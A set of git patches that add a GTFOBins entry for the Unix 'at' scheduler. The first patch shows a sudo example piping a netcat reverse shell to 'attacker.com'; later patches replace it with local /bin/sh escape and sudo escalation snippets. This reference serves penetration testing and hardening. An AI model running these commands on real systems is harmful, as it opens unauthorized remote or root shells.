From e241cd3aa7aba9df932a8a6570d6901dc1e6a6ea Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sun, 10 Jan 2021 22:15:01 +0530 Subject: [PATCH 1/3] added at --- _gtfobins/at.md | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 _gtfobins/at.md diff --git a/_gtfobins/at.md b/_gtfobins/at.md new file mode 100644 index 0000000..43342ed --- /dev/null +++ b/_gtfobins/at.md @@ -0,0 +1,8 @@ +--- +description: | + at is a command-line utility that allows you to schedule commands to be executed at a particular time. +functions: + sudo: + - code: | + echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes +--- \ No newline at end of file From 578f951c76fe81c38e51451b63b067527821c3fc Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 15 Jan 2021 20:30:23 +0100 Subject: [PATCH 2/3] Improve at and add the shell function --- _gtfobins/at.md | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/_gtfobins/at.md b/_gtfobins/at.md index 43342ed..19076d4 100644 --- a/_gtfobins/at.md +++ b/_gtfobins/at.md @@ -1,8 +1,14 @@ --- -description: | - at is a command-line utility that allows you to schedule commands to be executed at a particular time. functions: + shell: + - code: | + echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null + command: + - description: The invocation will be blind, but it is possible to redirect the output to a file in a readable location. + code: | + COMMAND=id + echo "$COMMAND" | at now sudo: - code: | - echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes ---- \ No newline at end of file + echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null +--- From 013bf5a0c934786bcbe9934547e0e940c379ead2 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Fri, 15 Jan 2021 20:38:33 +0100 Subject: [PATCH 3/3] Fix newlines in at --- _gtfobins/at.md | 28 ++++++++++++++-------------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/_gtfobins/at.md b/_gtfobins/at.md index 19076d4..958cb6e 100644 --- a/_gtfobins/at.md +++ b/_gtfobins/at.md @@ -1,14 +1,14 @@ ---- -functions: - shell: - - code: | - echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null - command: - - description: The invocation will be blind, but it is possible to redirect the output to a file in a readable location. - code: | - COMMAND=id - echo "$COMMAND" | at now - sudo: - - code: | - echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null ---- +--- +functions: + shell: + - code: | + echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null + command: + - description: The invocation will be blind, but it is possible to redirect the output to a file in a readable location. + code: | + COMMAND=id + echo "$COMMAND" | at now + sudo: + - code: | + echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null +---